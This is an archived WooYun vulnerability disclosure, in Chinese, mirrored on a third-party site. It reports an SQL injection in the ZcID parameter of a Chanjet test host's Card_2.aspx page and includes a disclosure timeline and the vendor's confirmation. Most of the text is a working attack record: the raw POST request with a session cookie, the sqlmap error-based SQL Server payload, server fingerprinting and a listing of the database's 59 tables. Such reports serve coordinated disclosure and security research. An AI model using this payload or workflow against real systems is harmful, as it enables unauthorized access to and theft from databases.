乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-06: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-18: 细节向核心白帽子及相关领域专家公开 2015-10-28: 细节向普通白帽子公开 2015-11-07: 细节向实习白帽子公开 2015-11-22: 细节向公众公开
POST /Card_2.aspx HTTP/1.1Content-Length: 301Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://treistertest.chanjet.comCookie: ASP.NET_SessionId=405q5pz23k3tg0451cqkugbrHost: treistertest.chanjet.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*ZcID=OA&__EVENTVALIDATION=/wEWAgLMkJisBwLj7c7hARq0%2b9wFfKIupqhlfeZ6GaGeVsmI&__VIEWSTATE=/wEPDwUKMTYyODY2MzAzNw9kFgICAw9kFgQCAQ8WAh4HVmlzaWJsZWhkAgMPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZBY/t3B6ofgzuPmIM2QSdG2IwzEE
ZcID参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: ZcID (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ZcID=OA' AND 6965=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6965=6965) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'tooO'='tooO&__EVENTVALIDATION=/wEWAgLMkJisBwLj7c7hARq0+9wFfKIupqhlfeZ6GaGeVsmI&__VIEWSTATE=/wEPDwUKMTYyODY2MzAzNw9kFgICAw9kFgQCAQ8WAh4HVmlzaWJsZWhkAgMPPCsADQEADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmRkGAEFCUdyaWRWaWV3MQ88KwAKAQhmZBY/t3B6ofgzuPmIM2QSdG2IwzEE---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: distribution[59 tables]+------------------------------------+| IHarticles || IHcolumns || IHconstrainttypes || IHextendedArticleView || IHextendedSubscriptionView || IHindextypes || IHpublications || IHpublishercolumnconstraints || IHpublishercolumnindexes || IHpublishercolumns || IHpublisherconstraints || IHpublisherindexes || IHpublishers || IHpublishertables || IHsubscriptions || IHsyscolumns || MSarticles || MScached_peer_lsns || MSdistribution_agents || MSdistribution_history || MSdistribution_status || MSlogreader_agents || MSlogreader_history || MSmerge_agents || MSmerge_articlehistory || MSmerge_articleresolver || MSmerge_history || MSmerge_identity_range_allocations || MSmerge_sessions || MSmerge_subscriptions || MSpublication_access || MSpublications || MSpublicationthresholds || MSpublisher_databases || MSqreader_agents || MSqreader_history || MSrepl_backup_lsns || MSrepl_commands || MSrepl_errors || MSrepl_identity_range || MSrepl_originators || MSrepl_transactions || MSrepl_version || MSreplication_monitordata || MSsnapshot_agents || MSsnapshot_history || MSsubscriber_info || MSsubscriber_schedule || MSsubscriptions || MSsync_states || MStracer_history || MStracer_tokens || UIProperties || sysarticlecolumns || sysarticles || sysextendedarticlesview || syspublications || sysschemaarticles || syssubscriptions |+------------------------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-08 14:55
感谢您对我们的关注和支持,该问题存在,我们正在修复。
暂无